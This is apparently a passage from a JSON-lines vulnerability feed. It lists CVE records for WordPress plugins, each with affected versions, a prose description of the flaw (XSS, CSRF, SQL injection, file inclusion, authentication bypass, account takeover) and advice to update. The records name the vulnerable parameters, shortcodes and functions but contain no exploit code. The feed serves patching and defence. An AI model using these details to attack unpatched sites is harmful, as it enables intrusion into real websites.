version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee60943-b583-4a99-8e62-846b380c98aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee60943-b583-4a99-8e62-846b380c98aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.1.14\\\/includes\\\/users\\\/class-charitable-user.php#L872\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.1.14\\\/includes\\\/users\\\/class-charitable-user.php#L872\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154009\\\/charitable\\\/trunk\\\/includes\\\/users\\\/class-charitable-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154009\\\/charitable\\\/trunk\\\/includes\\\/users\\\/class-charitable-user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0852","slug":"coreactivity","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The coreActivity: Activity Logging for WordPress plugin before 1.8.1 does not escape some request data when outputting it back in the admin dashboard, allowing unauthenticated users to perform Stored XSS attack against high privilege users such as admin","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/743c4d79-e1d5-4fb0-a17d-296df2c54e8a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/743c4d79-e1d5-4fb0-a17d-296df2c54e8a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4831","slug":"pmpro-register-helper","versionEndExcluding":"1.8.1","description":"The Custom User Profile Fields for User Registration WordPress plugin before 1.8.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/872fc8e6-4035-4e5a-9f30-16c482c48c7c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/872fc8e6-4035-4e5a-9f30-16c482c48c7c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7115","slug":"pagelayer","versionImpact":"1.7.9","versionEndExcluding":"1.8.1","description":"The Page Builder: Pagelayer WordPress plugin before 1.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ddd1a9e-3f96-4020-9b2b-f818a4d5ba58\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ddd1a9e-3f96-4020-9b2b-f818a4d5ba58\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-41816","slug":"cooked","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the \u2018[cooked-timer]\u2019 shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-3gw3-2qjq-xqjj\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-3gw3-2qjq-xqjj\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/ac7455bdccc99fb2f5b3c7611312947c1623c3ec\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/ac7455bdccc99fb2f5b3c7611312947c1623c3ec\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12295","slug":"boombox-theme-extensions","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The BoomBox Theme Extensions plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.8.0. This is due to the plugin not properly validating a user's identity prior to updating their password through the 'boombox_ajax_reset_password' function. This makes it possible for authenticated attackers, with subscriber-level privileges and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/boombox-viral-buzz-wordpress-theme\\\/16596434\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/boombox-viral-buzz-wordpress-theme\\\/16596434\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c453aaf6-767d-4929-bbb3-3c0b78b0507a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c453aaf6-767d-4929-bbb3-3c0b78b0507a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9530","slug":"qi-addons-for-elementor","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.0 via private templates. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the contents of templates that are private.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dd93514-657c-4b04-931a-23f3d405fb88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dd93514-657c-4b04-931a-23f3d405fb88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3170536%40qi-addons-for-elementor%2Ftrunk&old=3159768%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3170536%40qi-addons-for-elementor%2Ftrunk&old=3159768%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4862","slug":"filester","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The File Manager Pro WordPress plugin before 1.8.1 does not adequately validate and escape some inputs, leading to XSS by high-privilege users.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81821bf5-69e1-4005-b3eb-d541490909cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81821bf5-69e1-4005-b3eb-d541490909cc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4861","slug":"filester","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The File Manager Pro WordPress plugin before 1.8.1 allows admin users to upload arbitrary files, even in environments where such a user should not be able to gain full control of the server, such as a multisite installation. This leads to remote code execution.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fa03f00-25c7-4e40-8592-bb4001ce019d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fa03f00-25c7-4e40-8592-bb4001ce019d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48300","slug":"embed-privacy","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The `Embed Privacy` plugin for WordPress that prevents the loading of embedded external content is vulnerable to Stored Cross-Site Scripting via `embed_privacy_opt_out` shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Version 1.8.1 contains a patch for this issue.\n","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/security\\\/advisories\\\/GHSA-3wv9-4rvf-w37g\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/security\\\/advisories\\\/GHSA-3wv9-4rvf-w37g\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/issues\\\/199\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/issues\\\/199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/commit\\\/f80929992b2a5a66f4f4953cd6f46cc227154a5c\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/commit\\\/f80929992b2a5a66f4f4953cd6f46cc227154a5c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/d.pr\\\/v\\\/ORuIat\",\"name\":\"https:\\\/\\\/d.pr\\\/v\\\/ORuIat\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5336","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The iPanorama 360 \u2013 WordPress Virtual Tour Builder plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980553\\\/ipanorama-360-virtual-tour-builder-lite#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980553\\\/ipanorama-360-virtual-tour-builder-lite#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipanorama-360-virtual-tour-builder-lite\\\/tags\\\/1.8.0\\\/includes\\\/plugin.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipanorama-360-virtual-tour-builder-lite\\\/tags\\\/1.8.0\\\/includes\\\/plugin.php#L439\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3566b602-c991-488f-9de2-57236c4735b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3566b602-c991-488f-9de2-57236c4735b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12859","slug":"boombox-theme-extensions","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The BoomBox Theme Extensions plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.8.0 via the 'boombox_listing' shortcode 'type' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.px-lab.com\\\/boombox\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/documentation.px-lab.com\\\/boombox\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3a647b6-ed9e-402d-9424-2937f7aa8960?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3a647b6-ed9e-402d-9424-2937f7aa8960?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6070","slug":"if-so","versionImpact":"1.8.0.3","versionEndExcluding":"1.8.0.4","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.8.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97bab6cf-011c-4df4-976c-1f3252082f8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97bab6cf-011c-4df4-976c-1f3252082f8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5713","slug":"if-so","versionImpact":"1.8.0.3","versionEndExcluding":"1.8.0.4","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.4 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 1.8.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb3f24a7-3171-42c3-9016-e29da4f384fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb3f24a7-3171-42c3-9016-e29da4f384fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5440","slug":"if-so","versionImpact":"1.8.0.2","versionEndExcluding":"1.8.0.3","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52fdc271-96f2-4e25-9df2-29a3ce06328c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52fdc271-96f2-4e25-9df2-29a3ce06328c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25216","slug":"rich-reviews","versionImpact":"1.7.4","versionEndExcluding":"1.8.0","description":"The Rich Review plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the POST body 'update' parameter in versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db701ad3-10fd-4a40-b239-139fbc95ab61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db701ad3-10fd-4a40-b239-139fbc95ab61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/09\\\/rich-reviews-plugin-vulnerability-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/09\\\/rich-reviews-plugin-vulnerability-exploited-in-the-wild\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/plugin-not-supported-open-to-malware-uninstall-now\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/plugin-not-supported-open-to-malware-uninstall-now\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81bdc004-9b9c-49e2-b337-35a6d8395c5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81bdc004-9b9c-49e2-b337-35a6d8395c5d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5124","slug":"pagelayer","versionEndExcluding":"1.8.0","description":"The Page Builder: Pagelayer WordPress plugin before 1.8.0 doesn't prevent attackers with administrator privileges from inserting malicious JavaScript inside a post's header or footer code, even when unfiltered_html is disallowed, such as in multi-site WordPress configurations.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ef86546-3467-432c-a863-1ca3e5c65bd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ef86546-3467-432c-a863-1ca3e5c65bd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39682","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary HTML in pages that will be shown whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-fx69-f77x-84gr\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-fx69-f77x-84gr\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39681","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-q7p9-2x5h-vxm7\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-q7p9-2x5h-vxm7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39680","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-f2mc-hcp9-6xgr\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-f2mc-hcp9-6xgr\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39679","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-2jh3-9939-c4rc\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-2jh3-9939-c4rc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39678","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-pp3h-ghxf-r9pc\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-pp3h-ghxf-r9pc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37308","slug":"cooked","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"The Cooked Pro recipe plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the `_recipe_settings[post_title]` parameter in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page. A patch is available at commit 8cf88f334ccbf11134080bbb655c66f1cfe77026 and will be part of version 1.8.0.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-9vfv-c966-jwrv\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-9vfv-c966-jwrv\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/8cf88f334ccbf11134080bbb655c66f1cfe77026\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/8cf88f334ccbf11134080bbb655c66f1cfe77026\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5774","slug":"animated-counters","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1zXWW545ktCznO36k90AN0APhTz8ky-gG\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1zXWW545ktCznO36k90AN0APhTz8ky-gG\\\/view?usp=sharing\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c2756d-c300-479f-b3aa-8f22c3a70278?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c2756d-c300-479f-b3aa-8f22c3a70278?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2984228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2984228\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4827","slug":"filester","versionImpact":"1.7.6","versionEndExcluding":"1.8","description":"The File Manager Pro WordPress plugin before 1.8 does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4daf0e1-8018-448a-964c-427a355e005f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4daf0e1-8018-448a-964c-427a355e005f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13733","slug":"skt-blocks","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The SKT Blocks \u2013 Gutenberg based Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's skt-blocks\/post-carousel block in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-blocks\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-blocks\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233980\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skt-blocks\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skt-blocks\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a84999-bd1b-4b86-9fa1-09c20b50ce37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a84999-bd1b-4b86-9fa1-09c20b50ce37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11293","slug":"pie-register-social-site","versionImpact":"1.7.9","versionEndExcluding":"1.8","description":"The  Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction Social Sites Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/pieregister.com\\\/\",\"name\":\"https:\\\/\\\/pieregister.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466ff226-a47e-46f1-a46c-6260208ffd42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466ff226-a47e-46f1-a46c-6260208ffd42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6978","slug":"wp-job-manager-companies","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The WP Job Manager \u2013 Company Profiles plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'company' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198763%40wp-job-manager-companies&new=3198763%40wp-job-manager-companies&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198763%40wp-job-manager-companies&new=3198763%40wp-job-manager-companies&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
